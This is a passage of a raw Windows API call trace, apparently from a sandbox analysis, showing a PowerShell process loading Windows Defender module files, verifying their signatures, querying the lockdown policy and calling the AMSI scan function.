lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.569] EtwEventActivityIdControl () returned 0x0 [0276.569] EtwEventActivityIdControl () returned 0x0 [0276.569] EtwEventActivityIdControl () returned 0x0 [0276.570] EtwEventActivityIdControl () returned 0x0 [0276.570] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xf71a8796, Data2=0x4ded, Data3=0x43b8, Data4=([0]=0x9c, [1]=0x4a, [2]=0xaa, [3]=0x28, [4]=0xde, [5]=0x9b, [6]=0x60, [7]=0xdf))) returned 0x0 [0276.570] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xf40be63b, Data2=0xcffe, Data3=0x45c5, Data4=([0]=0x96, [1]=0xdd, [2]=0x7a, [3]=0xbb, [4]=0x18, [5]=0xa3, [6]=0x9f, [7]=0x64))) returned 0x0 [0276.570] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.570] EtwEventActivityIdControl () returned 0x0 [0276.570] EtwEventActivityIdControl () returned 0x0 [0276.570] EtwEventActivityIdControl () returned 0x0 [0276.571] EtwEventActivityIdControl () returned 0x0 [0276.572] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml")) returned 0x20 [0276.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.572] CoTaskMemAlloc (cb=0x20c) returned 0x1aceeff0 [0276.572] GetSystemDirectoryW (in: lpBuffer=0x1aceeff0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.573] CoTaskMemFree (pv=0x1aceeff0) [0276.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0276.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0276.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0276.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0276.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0276.573] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.573] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x3b8) returned 0x0 [0276.574] RegQueryValueExW (in: hKey=0x3b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0276.574] RegCloseKey (hKey=0x3b8) returned 0x0 [0276.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0276.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x26b2a78 | out: lpFileInformation=0x26b2a78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2)) returned 1 [0276.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0276.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0276.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2)) returned 1 [0276.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0276.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0276.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2)) returned 1 [0276.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0276.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0276.576] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0276.576] GetFileType (hFile=0x3b8) returned 0x1 [0276.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0276.576] GetFileType (hFile=0x3b8) returned 0x1 [0276.576] WTGetSignatureInfo () returned 0x0 [0276.690] CertDuplicateCertificateContext (pCertContext=0x1ad08c20) returned 0x1ad08c20 [0276.690] CryptCATHandleFromStore () returned 0x81ee00 [0276.690] WTHelperGetProvSignerFromChain () returned 0x81afc0 [0276.690] WTHelperGetProvCertFromChain () returned 0x1aa11250 [0276.691] CertDuplicateCertificateContext (pCertContext=0x1ad08ba0) returned 0x1ad08ba0 [0276.691] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x5dc) returned 0x0 [0276.691] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0276.692] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x26b32e0, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0276.692] RegCloseKey (hKey=0x5dc) returned 0x0 [0276.692] CoTaskMemAlloc (cb=0x10) returned 0x1ace7df0 [0276.692] CoTaskMemAlloc (cb=0x50) returned 0x1acc7a50 [0276.692] WinVerifyTrust () returned 0x0 [0276.693] CoTaskMemFree (pv=0x1acc7a50) [0276.693] CoTaskMemFree (pv=0x1ace7df0) [0276.693] CertFreeCertificateContext (pCertContext=0x1ad08c20) returned 1 [0276.693] CloseHandle (hObject=0x3b8) returned 1 [0276.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0276.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", nBufferLength=0x53, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml", lpFilePart=0x0) returned 0x52 [0276.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0276.694] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpSignature.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpsignature.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0276.694] GetFileType (hFile=0x3b8) returned 0x1 [0276.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0276.694] GetFileType (hFile=0x3b8) returned 0x1 [0276.695] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0276.695] ReadFile (in: hFile=0x3b8, lpBuffer=0x26b4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x26b4420*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.695] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0276.695] ReadFile (in: hFile=0x3b8, lpBuffer=0x26b4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x26b4420*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.696] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0276.696] ReadFile (in: hFile=0x3b8, lpBuffer=0x26b4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x26b4420*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.696] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0276.696] ReadFile (in: hFile=0x3b8, lpBuffer=0x26b4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x26b4420*, lpNumberOfBytesRead=0x1b83cd58*=0xcd2, lpOverlapped=0x0) returned 1 [0276.696] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3cd2 [0276.696] ReadFile (in: hFile=0x3b8, lpBuffer=0x26b3842, nNumberOfBytesToRead=0x32e, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x26b3842*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0276.696] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3cd2 [0276.696] ReadFile (in: hFile=0x3b8, lpBuffer=0x26b4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x26b4420*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0276.697] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1c90 [0276.697] GetSystemDirectoryW (in: lpBuffer=0x1acf1c90, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.697] CoTaskMemFree (pv=0x1acf1c90) [0276.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0276.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0276.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0276.697] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0276.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0276.698] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.698] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x5e0) returned 0x0 [0276.698] RegQueryValueExW (in: hKey=0x5e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0276.698] RegCloseKey (hKey=0x5e0) returned 0x0 [0276.698] CloseHandle (hObject=0x3b8) returned 1 [0276.704] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.705] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.705] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.705] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.705] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.705] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.705] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0276.705] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0276.772] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0x4dd843d0, Data2=0xf0e3, Data3=0x4a17, Data4=([0]=0x95, [1]=0xe, [2]=0x96, [3]=0x87, [4]=0xe, [5]=0x96, [6]=0xa8, [7]=0x9c))) returned 0x0 [0276.776] AmsiScanBuffer () returned 0x80070015 [0276.782] EtwEventWriteTransfer () returned 0x0 [0276.782] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.783] EtwEventActivityIdControl () returned 0x0 [0276.783] EtwEventActivityIdControl () returned 0x0 [0276.783] EtwEventActivityIdControl () returned 0x0 [0276.783] EtwEventActivityIdControl () returned 0x0 [0276.783] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.784] EtwEventActivityIdControl () returned 0x0 [0276.784] EtwEventActivityIdControl () returned 0x0 [0276.784] EtwEventActivityIdControl () returned 0x0 [0276.784] EtwEventActivityIdControl () returned 0x0 [0276.784] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xcf82ecc5, Data2=0x12f6, Data3=0x4972, Data4=([0]=0x95, [1]=0x77, [2]=0x3f, [3]=0x95, [4]=0x36, [5]=0x2a, [6]=0x12, [7]=0x12))) returned 0x0 [0276.784] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x2bbc3ea9, Data2=0x86da, Data3=0x4113, Data4=([0]=0xbd, [1]=0x35, [2]=0x3, [3]=0x91, [4]=0xe7, [5]=0x25, [6]=0x4, [7]=0xbc))) returned 0x0 [0276.784] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.785] EtwEventActivityIdControl () returned 0x0 [0276.785] EtwEventActivityIdControl () returned 0x0 [0276.785] EtwEventActivityIdControl () returned 0x0 [0276.786] EtwEventActivityIdControl () returned 0x0 [0276.786] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml")) returned 0x20 [0276.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.787] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1630 [0276.788] GetSystemDirectoryW (in: lpBuffer=0x1acf1630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.788] CoTaskMemFree (pv=0x1acf1630) [0276.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0276.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0276.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0276.788] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0276.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0276.788] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.789] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x3b8) returned 0x0 [0276.789] RegQueryValueExW (in: hKey=0x3b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0276.789] RegCloseKey (hKey=0x3b8) returned 0x0 [0276.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0276.789] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2755bf8 | out: lpFileInformation=0x2755bf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889)) returned 1 [0276.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0276.790] GetFullPathNameW 